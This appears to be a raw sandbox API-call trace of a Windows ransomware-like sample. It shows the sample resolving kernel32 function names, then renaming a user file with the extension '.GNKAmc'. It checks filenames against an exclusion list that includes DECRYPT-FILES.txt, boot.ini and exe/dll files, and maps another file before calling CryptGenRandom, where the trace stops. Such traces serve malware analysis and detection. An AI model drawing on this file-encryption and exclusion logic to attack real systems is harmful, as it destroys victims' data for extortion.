[0082.536] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.536] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.536] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.536] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.536] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.536] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.536] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.536] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.536] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.536] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.536] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.536] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.536] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.536] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.536] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.536] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.537] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.537] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.537] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.537] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.537] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.537] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.537] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.537] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.537] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.537] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.537] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.537] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.537] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.537] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.537] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.537] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.537] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.537] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.538] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.538] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.538] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.538] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.538] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.538] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.538] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.538] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.538] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.538] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.538] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.538] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.538] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.538] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.538] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.538] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.538] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.538] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.538] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.539] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.539] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.539] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.539] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.539] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.539] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.539] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.539] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.539] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.539] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.539] lstrlenA (lpString="DELETEATOM") returned 10 [0082.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.539] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.539] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.539] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.539] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.539] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.539] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.539] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.539] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.540] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.540] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.540] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.540] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.540] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.540] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.540] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.540] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.540] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.540] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.540] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.540] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.540] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.540] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.540] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.540] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.540] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.540] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.540] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.540] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.541] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.541] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.541] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.541] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.541] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.541] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.541] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.541] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.541] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.541] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.541] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.541] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.541] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.541] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.541] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.541] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.542] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\v5RW.gif") returned 54 [0082.542] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\v5RW.gif.GNKAmc") returned 61 [0082.542] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\v5RW.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\v5rw.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\v5RW.gif.GNKAmc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\v5rw.gif.gnkamc"), dwFlags=0x0) returned 1 [0082.543] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.543] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.544] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.544] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x359d8d30, ftCreationTime.dwHighDateTime=0x1d4c56a, ftLastAccessTime.dwLowDateTime=0x9251a590, ftLastAccessTime.dwHighDateTime=0x1d4ceaf, ftLastWriteTime.dwLowDateTime=0x9251a590, ftLastWriteTime.dwHighDateTime=0x1d4ceaf, nFileSizeHigh=0x0, nFileSizeLow=0x16c77, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vt5loZ_qw3.wav", cAlternateFileName="VT5LOZ~1.WAV")) returned 1 [0082.544] lstrcmpiW (lpString1="Vt5loZ_qw3.wav", lpString2="DECRYPT-FILES.txt") returned 1 [0082.544] lstrcmpiW (lpString1="Vt5loZ_qw3.wav", lpString2="autorun.inf") returned 1 [0082.544] lstrcmpiW (lpString1="Vt5loZ_qw3.wav", lpString2="boot.ini") returned 1 [0082.544] lstrcmpiW (lpString1="Vt5loZ_qw3.wav", lpString2="desktop.ini") returned 1 [0082.544] lstrcmpiW (lpString1="Vt5loZ_qw3.wav", lpString2="ntuser.dat") returned 1 [0082.544] lstrcmpiW (lpString1="Vt5loZ_qw3.wav", lpString2="iconcache.db") returned 1 [0082.544] lstrcmpiW (lpString1="Vt5loZ_qw3.wav", lpString2="bootsect.bak") returned 1 [0082.544] lstrcmpiW (lpString1="Vt5loZ_qw3.wav", lpString2="ntuser.dat.log") returned 1 [0082.544] lstrcmpiW (lpString1="Vt5loZ_qw3.wav", lpString2="thumbs.db") returned 1 [0082.544] lstrcmpiW (lpString1="Vt5loZ_qw3.wav", lpString2="Bootfont.bin") returned 1 [0082.544] lstrlenW (lpString="Vt5loZ_qw3.wav") returned 14 [0082.544] lstrcmpiW (lpString1="wav", lpString2="lnk") returned 1 [0082.544] lstrcmpiW (lpString1="wav", lpString2="exe") returned 1 [0082.544] lstrcmpiW (lpString1="wav", lpString2="sys") returned 1 [0082.544] lstrcmpiW (lpString1="wav", lpString2="dll") returned 1 [0082.544] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0082.544] lstrlenW (lpString="Vt5loZ_qw3.wav") returned 14 [0082.544] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0082.544] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Vt5loZ_qw3.wav" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Vt5loZ_qw3.wav") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Vt5loZ_qw3.wav" [0082.544] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.545] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Vt5loZ_qw3.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\vt5loz_qw3.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0082.545] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=93303) returned 1 [0082.545] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0082.545] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0082.545] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 